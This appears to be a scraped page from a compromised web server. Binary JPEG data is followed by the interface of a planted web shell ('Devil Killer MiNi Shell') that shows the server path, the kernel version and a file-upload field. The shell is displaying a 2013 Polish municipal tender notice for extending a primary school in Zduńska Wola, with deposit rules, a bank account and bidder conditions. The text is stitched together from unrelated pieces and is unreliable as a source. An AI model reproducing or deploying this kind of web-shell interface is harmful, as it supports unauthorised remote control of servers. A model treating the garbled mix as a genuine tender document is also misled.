JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130711/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130711/271582-N-2013.html

<p class="kh_header"><b>Zduńska Wola: Rozbudowa budynku Szkoły Podstawowej nr 7</b><br>
<b>Numer ogłoszenia: 271582 - 2013; data zamieszczenia: 11.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zduńska Wola , ul. Stefana Złotnickiego 12, 98-220 Zduńska Wola, woj. łódzkie, tel. 43 825 02 00, faks 43 825 02 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdunskawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku Szkoły Podstawowej nr 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa budynku Szkoły Podstawowej nr 7. Adres inwestycji: Zduńska Wola ul. Wodna 32, Obr. 3, działka nr geodezyjny 288.
Przedmiotowa inwestycja polegać będzie na rozbudowie istniejącej szkoły, przez dobudowanie dwukondygnacyjnej części dydaktycznej - z salami lekcyjnymi oraz nadbudowie i przebudowie istniejącego fragmentu szkoły. Przedmiotowa rozbudowa ma na celu utworzenie nowych pomieszczeń dydaktycznych z przeznaczeniem dla klas I-III, co służyć będzie poprawie warunków nauki. Obie sale lekcyjne są przeznaczone na ok. 20 uczniów. Dla ich potrzeb zaprojektowano sanitariaty oraz szatnię. Projektowana i przebudowywana część szkoły, wyposażona będzie w instalację elektryczną, wodociągową i kanalizacyjną w oparciu o istniejące w budynku instalacje wewnętrzne zasilane z istniejących przyłączy. Odprowadzanie wód opadowych z dachów do kanalizacji deszczowej wg odrębnego opracowania. Ogrzewanie części dobudowanej odbywać się będzie z istniejącej kotłowni gazowej. Podłogi w pomieszczeniach dydaktycznych - parkiet drewniany, podłogi w ciągach komunikacyjnych - antypoślizgowy gres lub wykładzina PCV. Ściany pomieszczeń sanitarnych wykończyć glazurą fugowaną do wysokości co najmniej 2,0 m, sufity malować farbą wodoodporną. W miejscach, gdzie występują zlewozmywak lub umywalki ściany wykończyć glazurą fugowaną do wysokości co najmniej 1,6m z każdej strony na szerokość 1,0m od urządzenia. W pomieszczeniu szatni ściany zmywalne (farby zmywalne np. silikonowe). 
Poddany rozbudowie istniejący budynek szkoły posiadał będzie powierzchnię zabudowy 1512,9 m2, powierzchnię użytkową 2153,0 m2, kubaturę 12.592,0 m3. Obiekt zaliczony do budynków użyteczności publicznej z dwiema kondygnacjami nadziemnymi bez podpiwniczenia. Wysokość budynku nie przekraczająca 12 m kwalifikuje go do budynków niskich (N). Budynek zlokalizowany jako wolnostojący zlokalizowany w odległości ponad 4 m od granicy najbliższej działki budowlanej oraz dobudowany poprzez ścianę oddzielenia, przeciwpożarowego do istniejącego budynku szkoły podstawowej. Dla występujących przeszkleń w obu ścianach zewnętrznych budynków zapewniono odległość min. 8 m. Od innego budynku projektowany obiekt zlokalizowany w odległości ok. 6 m (budynek posiada ścianę pełną)
Uwaga: Zamawiający zastrzega, że zamierza realizować inwestycję w cyklu dwuletnim: 
w 2013 r. należy wykonać fundamenty z ich izolacją w części nowej i istniejącej
do 29.08.2014 r. należy wykonać pozostałe roboty.
Z uwagi na warunki atmosferyczne w 2013 r. zakres prac za zgodą inspektorów nadzoru może zostać rozszerzony, jednak nie może przekroczyć kwoty zabezpieczonej na ten cel w budżecie miasta na 2013 rok.
UWAGA! Oprócz w/w robót należy uwzględnić w odpowiednich kosztorysach koszty dodatkowe : 
zabezpieczenie ścian na okres zimowy, jeśli zajdzie taka konieczność,
koszty geodezyjnej inwentaryzacji powykonawczej, której 2 egzemplarze Wykonawca przekaże Zamawiającemu,
koszty odtworzenia punktów osnowy geodezyjnej, które uległy zniszczeniu podczas prowadzenia robót,
koszty badań i sprawdzeń,
koszty zajęcia pasa drogowego jeżeli wystąpią,
koszty wyłączenia linii elektroenergetycznej, jeżeli wystąpią,
koszty wywozu ziemi i gruzu: nadmiar ziemi z wykopów, gruz, gałęzie, pnie i inne materiały z rozbiórki Wykonawca zagospodaruje i zutylizuje we własnym zakresie.
Koszty doliczyć do ww. robót.

Wykonawca zobowiązuje się tak zorganizować pracę pracownikom, plac budowy oraz realizację robót budowlanych, aby zapewnić jak najmniejszą uciążliwość dla funkcjonowania obiektu szkolnego i zapewnić pełne bezpieczeństwo użytkownikom szkoły i mieszkańcom sąsiednich posesji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie prawo udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, polegających na powtórzeniu tego samego rodzaju zamówień i zgodnych z przedmiotem zamówienia o wartości nie przekraczającej 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.10-5, 45.26.27.00-8, 45.26.28.00-9, 45.31.12.00-2, 45.11.12.91-4, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości: 30.000,00 zł (słownie: trzydzieści tysięcy złotych 00/100).
Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r., Nr 42, poz. 275,z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

Uwaga!
Wadium wnoszone w poręczeniach, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w pkt 2 ppkt 5), należy zdeponować przed upływem terminu składania ofert w Kasie Urzędu Miasta Zduńska Wola (budynek nr 4, parter, pokój nr 411) a kopię wadium załączyć do oferty. Z treści tych dokumentów musi wynikać bezwarunkowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo Zamówień Publicznych. Wyżej wymienione gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem przed upływem terminu składania ofert na rachunek bankowy Zamawiającego:
Bank Spółdzielczy w Poddębicach Nr konta 09 9263 0000 0544 0094 2005 0001
a dowód wniesienia wadium w postaci kopii dokonanego przelewu załączyć do oferty.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Zamawiający dokona zwrotu wadium, zgodnie z warunkami określonymi w art. 46 ustawy - Prawo zamówień publicznych. 
Wykonawca zobowiązany jest wnieść wadium na cały okres związania oferta, określony w rozdziale XI SIWZ.
Zamawiający zatrzymuje wadium zgodnie z warunkami określonymi w art. 46 ustawy - Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty zbliżone zakresem i charakterem do przedmiotu zamówienia. Jako zamówienie odpowiadające swoim rodzajem zamówieniu będącemu przedmiotem przetargu, Zamawiający uznaje co najmniej jedno zamówienie dotyczące budowy lub przebudowy obiektu kubaturowego o wartości minimum 1.000.000,00 złotych brutto.
Zamawiający informuje, że w przypadku dokumentów podanych w walucie innej niż PLN, przeliczanie wartości na walutę polską nastąpi na podstawie Tabeli A kursów średnich NBP z dnia ogłoszenia przedmiotowego przetargu do Biuletynu Zamówień Publicznych, będącej Załącznikiem nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami  posiadającymi  uprawnienia budowlane w specjalnościach: instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektryczno-energetyczne, oraz wodociągowych i kanalizacyjnych, a także konstrukcyjno-budowlanej, które mogą sprawować samodzielną funkcję w budownictwie zgodnie z aktualnie obowiązującymi przepisami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada zdolność kredytową lub środki finansowe na rachunku w wysokości nie mniejszej niż 200 000,00 zł (słownie dwieście tysięcy złotych).
Zamawiający informuje, że w przypadku dokumentów podanych w walucie innej niż PLN, przeliczanie wartości na walutę polską nastąpi na podstawie Tabeli A kursów średnich NBP z dnia ogłoszenia przedmiotowego przetargu do Biuletynu Zamówień Publicznych, będącej Załącznikiem nr 8 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dokument stwierdzający prawo osoby (osób) podpisującej ofertę do reprezentowania wykonawcy w postępowaniu o uzyskanie przedmiotowego zamówienia publicznego, ale tylko wtedy kiedy prawo do reprezentowania wykonawcy nie wynika z treści odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej;
2. dowód wniesienia wymaganej kwoty wadium;
3. kosztorysy ofertowe zgodne z przedmiarami robót;
4. zobowiązanie Podmiotu Trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (Załącznik nr 4 do SIWZ);
5. informacja o grupie kapitałowej (Załącznik nr 9 do SIWZ).
6. oświadczenie o spełnianiu warunków udziału w postępowaniu wg zał. Nr 2 do SIWZ ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy w sprawie przedmiotowego zamówienia, znajdują się w Załączniku nr 7 do SIWZ - Wzór umowy.
2.	Zamawiający dopuszcza niżej wymienione zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z art. 144 ustawy Prawo Zamówień Publicznych w następujących przypadkach:
2.1.	zmiana terminu realizacji zamówienia oraz terminów wynikających z harmonogramu będzie możliwa w przypadku: 
2.1.1.	działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnym terminie - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
2.1.2.	zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy - o czas trwania niesprzyjających warunków atmosferycznych,
2.1.3.	błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesieniem przez niego poprawek lub zmian w projekcie, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem zamówienia, 
2.1.4.	wystąpienia robót budowlanych dodatkowych niemożliwych do przewidzenia przed podpisaniem niniejszej umowy, jeżeli  konieczność wykonania robót dodatkowych zostanie potwierdzona protokolarnie, a ich wykonanie jest niezbędne do realizacji i zakończenia zamówienia podstawowego - o czas niezbędny do wykonania robót dodatkowych,
2.1.5.	zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają, w takim przypadku termin realizacji umowy zostanie wydłużony o czas niezbędny potrzebny do uzyskania tych dokumentów,
2.1.6.	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności:
a) nieterminowe przekazanie terenu budowy przez Zamawiającego;
b) wstrzymanie robót przez Zamawiającego; 
c) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej; 
d) zdolnościami płatniczymi;
e) warunki organizacyjne;
f) okoliczności, które nie były możliwe do przewidzenia w chwili zawarcia umowy;
w takiej sytuacji termin realizacji umowy zostanie wydłużony, o czas na który w/w okoliczności wstrzymały realizację umowy.
2.2.	zmiana sposobu spełnienia świadczenia (roboty, rozwiązania zamienne) będzie możliwa w przypadku: 
2.2.1.	konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań powodowało niewykonanie lub wadliwe wykonaniem przedmiotu umowy, w takiej sytuacji sposób spełnienia świadczenia nastąpi w oparciu o konieczne rozwiązania techniczne/ technologiczne i materiałowe.
